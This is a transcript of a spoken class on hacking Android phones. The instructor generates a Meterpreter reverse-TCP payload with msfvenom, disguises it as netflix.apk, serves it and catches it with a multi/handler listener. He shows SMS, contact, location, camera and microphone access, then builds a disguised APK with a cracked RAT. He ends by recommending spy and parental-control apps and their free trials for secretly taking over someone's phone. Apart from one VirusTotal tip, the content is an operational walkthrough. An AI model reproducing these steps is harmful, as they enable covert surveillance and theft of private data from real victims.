Guys, am I audible? Hello, am I audible?
Yeah,
Okay. So in today's class, we are going to cover up mobile hacking, and there are two methods by which we can hack a mobile phone, and how can I use both methods to hack a Android phone. Uh, The first method is using the Kali Linux operating system, in which I will use the Metasploit framework to create a payload. And the second method is using a RAT, which is also called remote administration tool. By using the RAT, I will try to hack a mobile phone, and I will create APK file and try to hack a phone. So I'm going to do all those things in a virtual environment, and I will use a mobile emulator for doing these things. So the first thing is, how can I create a lab for my Android hacking? So there are two methods. The first thing is, you can use Android emulators. Second is, you can use Android OS in your virtual environment. You can also use Android Studio Manager. And also Genymotion. And coming to the point, Android emulators are you have already used in your earlier times: BlueStack, Knox, Mamo, and many others. So these are the three ways to create an Android environment for testing an APK file. You can use any emulator, whether it is BlueStack, Knox, Mamo, and many others. And you can also create a virtual environment by using Android ISO file. And you can also use the Android Studio Manager as well as Genymotion. So I'm going to use Knox for testing purpose, and install Knox on my virtual environment. So I will install Knox player. So the website is Big Knox, and here you can download Knox. Uh, Wait for some time. Let it be installed. Download. So Nox has been installed, and you can see enable VT to improve the performance by 10 times. Okay. So Nox, ठीक है. So let me change my language. Let me power off my machine and let me set the virtualization enable in my processor so that it can work properly. The performance will not decrease. And here I will enable this and click OK. Till then, let me show you how to create a payload for Android phone and how you can hack using that payload. So there is a standalone payload generator which is called MSF Venom. MSF Venom is the standalone payload generator, and you can use it is a part of the Metasploit framework, and you can use this type of payload generator to create a payload for Android phone. So I'm creating a payload for the Android phone, and what will I do? I will type MSF Venom. MSF Venom is the command -p for payload, and I want to create a payload for Android. Android slash meterpreter slash meterpreter slash reverse TCP. I want a reverse connection on the payload so that I can take remotely access lhost, and I have to find my lhost. So let me open new terminal and type ifconfig. So my IP address is 192.168.0.110. Then I will use this IP -o -o for output, and the output will be on root slash desktop, and the name of the payload will be netflix.apk. So let's coming to the command. MSF Venom is the payload generator, -p for payload, Android slash meterpreter uh, slash reverse TCP. I want a connection, reverse connection. That's why I'm using the reverse TCP on port TCP. Lhost equals to my IP address, attacker's IP address. Lport equals to local port on which I want to listening the payload. -o for output, and the path of the output directory and name of the APK. Hit enter. So my payload has been created, and I can see by typing ls, you can see uh, coming to the desktop, ls, and here is my payload, netflix.apk. Let's move it to the my local server. So I will move slash var slash www.html. And what I want to move, I want to move netflix.apk. Now type ls and you can see there is no apk file. Let me start service apache to start. I'm starting my local server, that's so that I can transfer my file to the victim, and going to the directory where www.html. Here you can see there is a file netflix.apk. But before that, I have to create a listener. Then how can I create a listener? I have to use msf console. Msf console is the command to open the Metasploit framework. Here you have to use multi-use exploit multi/handler. Failed to load module. Okay, use exploit multi/handler. What I'm doing. Okay, so I'm using use exploit multi/handler. Now I want to set a payload, and the payload, what kind of payload I want to set? I want to set Android payload. So set payload Android/meterpreter/reverse TCP. Set lhost. And you can type show options to ensure that all the blank directories has been filled completely. You can see lhost is set now, lport is set now. Now you have to use exploit. So I'm listening now and I'm waiting for the target to install that payload. So let's install that payload to my Android phone. So I will type the IP address of the attacker slash name of the file. So I have downloaded it and I am opening it. As you can see, the main activity is installing now, and here I'm waiting for the sending stage meterpreter session 1 open. So the mobile has been hacked and I can get the information sysinfo Android 7.1.2, and I can also use multiple commands. Here you can see there are lots of commands here. If you want to as you can see, I am using a emulator. That's why I cannot access camera, SMS, call logs, microphone, etc., etc. But you can uh, do all these things if you are hacking a mobile. And watch the remote user desktop in real time, you can use the command screen share. And let me show you screen share. So it is not showing properly. Waiting, playing, waiting, playing. But if you are doing these types of things on a real mobile, you can uh, get a lot of information. If you want to know that the mobile is rooted or not, then okay, check root, check underscore root. You can see device is not rooted. And you can also use dump SMS for getting the SMSs. If you want to find out the contact, you can use get contact list. You can also use the call logs. If you want to start an activity from the URL string, you can start activity start. You can also get the information of geolocation. You can take a snapshot. You can also uh, start a video chat. You can record microphone. You can play a audio. You can do lots of things if you have access to a mobile phone, and you can uh, execute all these commands on that particular phone. So this is the way you can hack a mobile phone by using a manual method, and in which you have to create a payload yourself by typing some basic commands, and you have to create a listener yourself by using the MSF console. But if you want to use a rat, then what is the way to hack a mobile phone? So if you want to hack a phone by using any rat, then you have to use a rat. uh, Let me download a rat. Triple rate rat. I'm going to use triple rate rat, which is good. And you can also use it in mobile as well as Windows, because it creates a payload for both mobile platform as well as Windows platform. So you can download the app from here. Make sure you have installed Java, latest Java version in your operating system. If you have latest Java version, the rat will work properly. And if you don't have any Java or JDK installed in your operating system, then it will throw an error. So I have decompressed the rat file, and now I'm going to use the rat. So here is my rat file, and you have to open it and wait for some time, because it will show you some license agreement. And make sure don't use it in your main operating system, because it is a cracked one, and there is a possibility you can hack. You could be hacked by the person who have cracked the rat. So there is a file which is APK tool, and you have to put this file to the directory temp. So I am opening the temp directory. Here is my temp directory, temp% and temp, and you have to put that APK file here. You have to delete the existing file, and you have to paste the file which you have copied. Let me copy it again. Now I can create a APK file by using, make sure the mode is Android. Now the mode is Android, and I will go to the builder. Here it will ask for my IP address. It has already taken my IP. So I'm not changing anything. I'm just creating a server. Now the name of the file is JUYMNMTN. So let me find it. J. This is my file, and I am copying it, moving it here, and I will install it to my Android virtual environment. So here I will install it, and it will install with the name Google Media. And what will I do? I will start listening. Now I am waiting for the connection, and you can see the connection has been established, and it is showing the IP address of the machine, Android version Nougat, country India. The name of the file is Silverus, and company name of the phone is Samsung, model number, and you can right click, and you can access lots of things: file manager, cam capture, microphone, screenshot, get contacts, get messages, call info, installed app, GPS tracker, battery level, notification. You can also play sound. You can also get the information about the phone. You can also get the information about the server and all other files. If you want to check out the battery level, you can click on the battery level. You can see 75%, and the phone is not charging. And you can also access the file manager, and you have to select the SD card or DCIM. So I am accessing the SD card, and here you can see there are lots of files available, and you can use any kind of file for your reason. So I can also get the information about the phone. I can install app. I can also get the information about the install apps. So let me show it. You can see there are lots of apps are installed on the phone, and as I said earlier, it is just a virtual environment. That's why we have limited access to things. But if you are doing it on a regular phone or a specific phone, you can access all these features. So you can take a screenshot as well. You can see I just type hi, and the message was showing on the phone hi. Let me show you again. Uh, Yeah, I will type message notification hacked, and you can see the message is showing on the phone hacked. So this is the way to hack Android phone. But if you want to uh, keep yourself secure, so whenever a person send you an APK file, don't install it on your phone without testing it. If you want to check out the file that it is malicious or not, you can upload it to the virus total and you can check out is there any virus in the file or not. Even if you are using cracked version of lots of apps, like you are, if you are using going to use Truecaller cracked version, if you are going to Netflix cracked version, if you are going to any kind of cracked version of there, then you have to upload that file on the virus total to make sure that it is one malicious or not. Virus total has 60 plus antiviruses, and they will scan the file, and you can see it is analyzing, and one antivirus 5 has detected this is a virus 14. Here you can see out of 63 antivirus, only 18 antivirus detected that it is a virus file. So this is the way to create a malicious code for hacking a mobile phone, and you can do it by uh, creating a payload manually as well as automatically by using any kind of rat. There are lots of rat, you can use any rat, but 888 rat I will prefer you because it will create a payload for both Windows operating system as well as Linux Android operating system. So is there any question in your mind? Guys, any question?
No.
Amna, Priya, do you have any questions?
No.
Okay, so try to do these practicals yourself so that you can understand very well, and you can use Metasploit as well as any kind of rat for creating a payload. Even you can use spy softwares. You can free spy software. You can Google it, free spy app for Android. And there are lots of apps you can use for Android hacking. There are some tools which will give you a free trial, and there are some tools also which will also give you a free version with limited access. You can also use these kinds of, you know, these are called parental control apps. So if you type parental control apps, lots of websites will come up, and you can use any kind of tool. 6 best Android parental control apps and other methods. I'm a spy app locked by Ivy Mobile, Find My Kids, Google Family Links, Safe Logon, antivirus parental control apps. So you can use I'm a spy. Even there is a tool which is called Truth Spy, which is paid, but you can use trial version. And if you use a trial version for 7 days or three days, it will enough to hack or someone's phone completely, because you will get all the information within a day, and it is also giving you a 3-day trial or 7-day trial. And there are lots of features available in the Truth Spy. SMS spy, call recording, voice recording, WhatsApp spy, track browsing history, multimedia files, Snapchat spy, Facebook spy, Viber spy, Skype spy, contact history, app installed, hidden key logger, free control app, anything. You can do lots of things. And the step-by-step process to install this is given. So this is the way you can hack a phone by using parental control apps as well as Metasploit and Rat. So keep practicing, and if you will got stuck at any situation, you can ping me. Okay.